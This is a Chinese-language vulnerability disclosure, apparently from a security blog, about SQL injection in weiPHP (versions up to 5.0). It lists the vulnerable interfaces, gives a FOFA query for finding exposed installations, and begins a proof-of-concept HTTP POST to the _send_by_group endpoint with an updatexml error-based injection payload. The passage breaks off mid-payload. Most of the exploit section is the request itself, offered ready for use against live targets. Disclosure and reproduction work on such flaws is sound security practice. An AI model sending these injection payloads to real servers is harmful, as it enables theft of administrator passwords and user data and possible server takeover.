0x01 產品簡介

 weiphp 是一個開源，高效，簡潔的微信開發平臺，基于 oneThink 內容管理框架實現。

0x02 漏洞概述

 weiphp 微信開發平臺 _send_by_group、 wp_where、 get_package_template等接口處存在 SQL 注入漏洞，攻擊者利用此漏洞可獲取數據庫中的信息（例如，管理員后臺密碼、站點的用戶個人信息）之外，甚至在高權限的情況可向服務器中寫入木馬，進一步獲取服務器系統權限。

0x03 影響范圍

weiphp <=5.0

0x04 復現環境

FOFA：app="WeiPHP"

0x05 漏洞復現

PoC-1

POST /public/index.php/weixin/message/_send_by_group HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: closegroup_id[0]=exp&group_id[1]=%29+and+updatexml%281